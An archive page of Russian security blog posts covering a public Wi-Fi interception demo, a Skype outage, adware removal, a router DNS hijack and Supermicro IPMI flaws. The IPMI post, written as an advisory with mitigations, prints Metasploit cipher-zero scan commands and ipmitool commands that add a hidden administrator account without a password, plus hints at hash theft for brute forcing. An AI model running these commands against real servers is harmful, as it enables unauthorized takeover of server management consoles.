Архив рубрики: Sercurity

Эксперимент LifeNews и HeadLight Security: как воруют данные через публичный Wi-Fi

Бесплатный Wi-Fi появился в метро, на автобусных остановках, в парках, кафе и ресторанах, а значит проблема защищенности таких сетей касается уже миллионов пользователей. Насколько легко мошенники могут украсть вашу переписку, пароли, фотографии? И как себя защитить?

 

Эксперт по информационной безопасности компании HeadLight Security Олег «0x90» Купреев и телеканал LifeNews провели практическое исследование, в ходе которого были продемонстрированы основные приемы злоумышленников для перехвата и модификации данных Wi-Fi-трафика.
Исследователь вместе с журналистами расположились в одном из элитных спортбаров Москвы, в котором десятки людей смотрели футбольный матч. Почти каждый из многочисленных посетителей подключался к бесплатному Wi-Fi: кто-то выкладывал селфи, кто-то переписывался в соцсетях с друзьями и совершал покупки через интернет. В этом заведении уверены — их гости полностью защищены от киберпреступников. По словам управляющей спортбара Надежды Ованесовой, в беспроводной сети используется тип шифрования WPA2, что полностью обеспечивает безопасность данных (ну да, конечно)).
Так ли все на самом деле? Примерно полторы минуты понадобилось эксперту HeadLight Security, чтобы взломать беспроводную сеть спортабара и получить доступ к интересующим его ноутбукам. В роли «жертв» выступали устройства съемочной группы LifeNews. Программное обеспечение, используемое для взлома, позволяет подменять или искажать WiFi-трафик, незаметно осуществлять слежку за пользователем через веб-камеру его ноутбука и делать различные забавные штуки — дистанционно переворачивать изображение на экране компьютера вверх ногами, включать музыку. Однако развлечения сетевым злоумышленникам малоинтересны, их главная задача — собрать компромат или данные банковских карт.
Подробности эксперимента смотрите в репортаже LifeNews:
Олег Купреев — постоянный спикер крупнейших конференций по информационной безопасности (BlackHat, PHDaysZeroNights, Defcon Moscow). Один из последних его докладов, прозвучавший на форуме PHDays V, был как раз посвящён уязвимостям беспроводных сетей (видео находится по этому адресу).
С инструментами, которые использовал Олег в ходе эксперимента, можно ознакомиться на странице исследователя в Githab.

Автор:
Дата публикации:

Дмитрий Евтеев в эфире LifeNews: "У Skype есть альтернативы"

Технический директор компании Headlight Security Дмитрий Евтеев в эфире LifeNews прокомментировал сегодняшний глобальный сбой в работе Skype, предположив, что виноваты не хакеры, а человеческий фактор, и порекомендовал переходить на другие системы виртуального общения, в частности, на отечественный Telegram.

«В последнее время набирает обороты такой сервис, как Telegram. К сожалению, сейчас он позволяет обмениваться только текстовой информацией, но такие события, как сегодняшние, говорят о том, что наши разработчики вполне могут занять эту часть рынка», — отметил Дмитрий Евтеев.
Напомним, что сегодня утром у многих пользователей Skype во всем мире наблюдались проблемы с отображением статуса списка контактов, в результате чего они не могли осуществлять звонки. В некоторых случаях не работали и текстовые сообщения. Проблемы были зафиксированы, как в полнофункциональной, так и в мобильной версиях Skype, тогда как веб-версия продолжала работать. Официальный Твиттер Skype Support признал наличие проблемы.
В последние годы у Skype возникают проблемы самого разного характера. В июне 2013 года было обнаружено, что злоумышленники активно используют брешь в Skype, позволяющую после 9 жалоб навсегда заблокировать учетную запись пользователя. В декабре 2014 года появилась информация об уязвимости в Android-версии приложения, которая позволяет следить за жертвой через камеру и микрофон ее мобильного устройства. Совсем недавно, в июне 2015 года, выяснилось, что некоторые версии приложения аварийно завершают свою работу при получении в сообщении строки «http://:».
Наиболее запоминающаяся история произошла в ноябре 2012 года: пользователь Хабра продемонстрировал простую технику угона любого аккаунта Skype, опубликовав данный способ после безуспешных обращений в службу технической поддержки Skype в течение трех месяцев. В тоже самое время другой исследователь выявил, каким способом можно деанонимизировать IP-адрес собеседника. Надо сказать, что с 2012 года мало что изменилось — на неэффективную работу Skype Support в случае потери доступа к аккаунту пользователи обращали внимание и в 2015 году.

Полное интервью Дмитрия доступно по следующей ссылке (с 16-й минуты): https://peers.tv/show/lifenews/life_news/55198839/?autoplay=1

Другие ссылки по теме:
http://www.aif.ru/dontknows/actual/pochemu_ne_rabotaet_skype

Автор:
Дата публикации:

Удаление High Stairs — рекламная программа

Сегодня друг обнаружил, что его страничка ВКонтакте и стартовая страница Рамблера завалены посторонними рекламными блоками (типа, aliexpress).
Сначала подозрение пало на постороннее расширение в браузере Chrome: Переводчик. Оно был удалено через Дополнительные инструменты → Расширения, так как пользователем не устанавливалось.
Но проблема с рекламой не решилась.
Тогда решили посмотреть список недавно установленных программ (сделать это можно по адресу Пуск → Панель управления → Удаление программ или в программе-чистилке типа CCleaner). Так и есть, «злодей» найден: программа  High Stairs.

Она была немедленно удалена, назойливые рекламные блоки исчезли.
Вот видео по удалению High Stairshttp://www.youtube.com/watch?v=BqhCMmY-lS4
Вот этот сайт http://www.securitystronghold.com/ru/gates/remove-high-stairs.html предлагает целый комплекс мер по удалению программы High Stairs. (Не проверял).

Как же попала программа High Stairs на компьютер? Список загрузок браузера привел на сайт http://fontsgeek.com/ Конкретно, на скачивание шрифта http://fontsgeek.com/fonts/Trajan-Pro-Bold
Товарищ выбрал кнопку Installer Download и загрузил архив. Результат: антивирус AVG при сканировании файла выдал предупреждение

Trojan horse Generic



Будьте внимательны. Надеюсь, статья был вам полезна.

Автор: Роман Сталкер
Дата публикации: 2015-08-25T06:06:00.000-07:00

Не отображаются встроенные Яндекс карты

Начиная с версии Firefox 35, у пользователей появилась возможность силами браузера «просить» сайты не следить за ними (описание). Это имеет довольно неожиданный эффект для встроенных в сайт Яндекс карт — они просто не отображаются, оставляя пустое поле на странице и недоумение у посетителя.
При обращении к странице со встроенной картой в firebug можно наблюдать предупреждение: «Ресурс на «https://api-maps.yandex.ru/2.1/?lang=ru_RU» был заблокирован, так как включена защита от отслеживания.»

Чтобы не ломать вёрстку и не вводить в заблуждение посетителей сайта, надо предусмотреть проверку (включена ли такая функция защиты в Firefox) и выдавать предупреждение с понятной инструкцией, как можно карту всё-таки увидеть (нажать в адресной строке Firefox на иконку щита -> Настройки -> Отключить защиту для этого сайта).

Автор: Олег Ехлаков

О дырявых роутерах…

Звонит мне, значится, сегодня друг и говорит.

Что-то с Контактом какая-то фигня. Работает-работает, бах, сваливается на страницу авторизации. А на этой странице кроме кнопки войти всё остальное не работает и выдаёт ошибку. Вчера весь день комп на предмет вирусной дряни шмонал — ничего. А сегодня заметил, что и телефон при работе через wi-fi вытворяет то же самое. Сейчас подключил напрямую Интернет без роутера — вроде бы всё нормально. Может быть проблема в роутере?

Ну тут мне вспомнился давешний пост на OpenNet. Роутер Asus RT-N10R. Попросил сделать вывод nslookup:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:UsersUser>nslookup vk.com
Server: UnKnown
Address: 178.208.81.126

Name: vk.com
Address: 178.208.81.126

А должно быть как-то так:

C:UsersUser>nslookup vk.com
Server: router.asus.com
Address: 192.168.1.1 

Non-authoritative answer:
Name: vk.com
Addresses: 2a00:bdc0:3:103:1:0:403:901
2a00:bdc0:3:103:1:0:403:902
2a00:bdc0:3:103:1:0:403:903
87.240.131.99
87.240.131.97
87.240.131.120

Т.е. роутер отдавал клиентам сети в качестве dns-сервера 178.208.81.126 — адрес злоумышленника. При обращении к этому адресу 178.208.81.126 вылезла страничка «типа, одноклассников». В коде страницы честно присутствует:

 

 

Если запросить vk.com — вылезет страничка входа Контактика. Сброс роутера проблему временно решил. Обновили до последней прошивки. При возможности дополню.
PS. Будьте внимательны, используйте двухфакторную аутентификацию.
PS2. Аналогичный случай

Автор: Василий Иванов
Дата публикации: 2015-05-23T02:47:00.001-07:00

IPMI и безопасность

В IPMI Supermicro обнаружена серьезная проблема с безопасностью. Оказалось, что в файле PSBlock хранятся пароли в открытом виде (причина — в спецификации IPMI 2.0), а сам файл можно легко получить простым GET запросом через порт 49152. Уязвимость присутствует во всех платах Supermicro, использующих BMC Nuvoton WPCM450. Что делать?
Временное решение — отключить UPnP, убив соответствующие сервисы. Но при перезагрузке BMC UPnP будет снова запущен.
Если вы по какой-то странной причине просто взяли и выставили IPMI в интернет, то самое время перестать это делать. Как и любой интерфейс управления IPMI должен находится в отдельной сети, наружных доступ — только через VPN. Относитесь к IPMI любого вендора, как к заведомо небезопасному интерфейсу, который позволит злоумышленнику получить доступ к консоли сервера.
Помимо вчерашней уязвимости с PSBlock, есть еще обширный список давно известных уязвимостей, закрытых в последних прошивках. Описание есть на Rapid7:

Cipher 0. Самая скандальная уязвимость, связанная с изначальной ошибкой в спецификации IPMI 2.0. На запрос клиента об использовании нешифрованной передачи данных IPMI позволяет получить доступ без пароля. Вот пример того, что получилось в сети клиента (несколько серверов с платами X8 и X9) после сканирования из Metasploit shell:

msf exploit(libupnp_ssdp_overflow) > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf auxiliary(ipmi_cipher_zero) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(ipmi_cipher_zero) > run

[*] Sending IPMI requests to 192.168.1.0->192.168.1.255 (256 hosts)
[+] 192.168.1.32:623 — IPMI — VULNERABLE: Accepted a session open request for cipher zero
[+] 192.168.1.71:623 — IPMI — VULNERABLE: Accepted a session open request for cipher zero
[+] 192.168.1.219:623 — IPMI — VULNERABLE: Accepted a session open request for cipher zero
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Получаем список пользователей:

ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user list
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
2   ADMIN            false   false      true       ADMINISTRATOR

Добавляем пользователя с ID=3 и администраторскими правами:

ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user set name 3 quartz
ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user set password 3 Q123q
ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user priv 3 4
ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user enable 3

Получаем доступ:

IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval. Снова проблема в спецификации IPMI 2.0, которая приводит к курьезу: система без всякой авторизации просто отдает хэш пароля. Можно забрать хэши и заняться брутфорсом при помощи какого-нибудь JohnTheRipper.
Есть еще куча дыр: UPnP, анонимный доступ (пользователь с пустым именем), локальный доступ из ОС хоста без авторизации… Уязвимости закрываются в новых прошивках IPMI, но выявляются новые.
Внимательно прочтите «IPMI Security Best Practices» и ограничьте доступ к IPMI.

Автор: Dmitry Nosachev